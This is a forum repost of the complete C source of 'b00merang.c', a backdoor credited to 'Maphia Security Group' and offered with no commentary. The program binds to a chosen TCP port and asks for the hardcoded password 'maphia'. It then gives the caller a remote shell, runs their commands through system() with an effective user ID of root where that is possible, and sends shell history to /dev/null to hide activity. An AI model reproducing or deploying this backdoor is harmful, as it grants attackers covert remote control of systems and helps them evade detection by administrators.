[转载]A backdoor by Maphia Security
文章作者:clad[code]/*
* b00merang.c
* A simply backdoor
* Maphia Security Group (c) 2004
*
* wrote by: clad
* 25.12.2004 (Marry Christmas)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <signal.h>
#include <fcntl.h>
#include <pwd.h>
#include <sys/ioctl.h>
#include <sys/utsname.h>
#define BACKLOG 10
#define PRINT_ERROR error ();
#define BUFFER 396
#define PASS "maphia"
#define EXIT "exit"
void error (void)
{
perror ("Error!");
exit (EXIT_FAILURE);
}
void crea_socket (int *sockfd)
{
int yes = 1;
if ((*sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
PRINT_ERROR;
if (setsockopt(*sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
PRINT_ERROR;
}
int usage (char *field)
{
fprintf(stdout, "Maphia Backdoor \n" \
"Usage: %s <port to listen> \n" , field);
exit(EXIT_FAILURE);
}
void handler (int sin)
{
while (wait(NULL) > 0);
}
void sigations (void)
{
struct sigaction sun;
sun.sa_handler = handler;
sigemptyset (&sun.sa_mask);
sun.sa_flags = SA_RESTART;
if (sigaction(SIGCHLD, &sun, NULL) == -1)
PRINT_ERROR;
}
void bind_listen (int socks, struct sockaddr_in sin)
{
if (bind(socks, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
PRINT_ERROR;
if (listen(socks, BACKLOG) == -1)
PRINT_ERROR;
}
void login (void)
{
int x, str;
char pass[20];
fgets (pass, 20, stdin);
pass[strlen(pass) -1] = '\0';
x = strncmp(pass, PASS, strlen(PASS));
if (!x) {
printf("User loggin\n");
} else
exit (0);
}
void exec_cmd (char cmd[BUFFER])
{
char cm[BUFFER];
cmd[strlen(cmd) -1] = '\0';
if (!strncmp(cmd, EXIT, 4)) {
exit (0);
} else {
snprintf(cm, BUFFER, "%s;\n", cmd);
system(cm);
}
}
static
void set_uid (char sh[50], char mach[SYS_NMLN], char *folder)
{
int uid = getuid();
if(!uid) {
snprintf(sh, 50, "[%s@%s]#", mach, folder);
} else
snprintf(sh, 50, "[%s@%s]$", mach, folder);
}
static void prompt(void)
{
struct utsname buf;
char machine[SYS_NMLN];
char *dir, shell[50];
strcpy(machine, "Unknown");
if (uname(&buf) != -1)
strcpy(machine, buf.nodename);
dir = (char *) getcwd(NULL, 0);
set_uid (shell, machine, dir);
fputs(shell, stdout);
fflush (stdout);
}
void shell (void)
{
char cmd[BUFSIZ];
int id = getuid ();
chdir ("/");
for ( ;; ) {
prompt ();
fgets (cmd, BUFFER, stdin);
seteuid (0);
exec_cmd (cmd);
seteuid (id);
}
}
void got_connection (struct sockaddr_in old_a, int old_s)
{
int size, new_s;
struct sockaddr_in new_addr;
for ( ;; ) {
size = sizeof(struct sockaddr_in);
if ((new_s = accept(old_s, (struct sockaddr *)&new_addr, &size)) == -1)
PRINT_ERROR;
if (!fork()) {
dup2(new_s, STDIN_FILENO);
dup2(new_s, STDOUT_FILENO);
dup2(new_s, STDERR_FILENO);
close (old_s);
setenv("TERM","vt100",1);
setenv("HISTFILE","/dev/null",1);
login ();
shell ();
close (new_s);
exit (0);
}
close (new_s);
}
}
int main (int argc, char** argv)
{
int old_sock, new_sock, size, r, uid;
struct sockaddr_in old_addr, new_addr;
if (argc < 2)
usage (argv[0]);
old_addr.sin_family = AF_INET;
old_addr.sin_port = htons((u_short) atoi(argv[1]));
old_addr.sin_addr.s_addr = INADDR_ANY;
memset (&(old_addr.sin_zero), '\0', 8);
crea_socket (&old_sock);
bind_listen (old_sock, old_addr);
got_connection (old_addr, old_sock);
return (0);
}[/code]
页:
[1]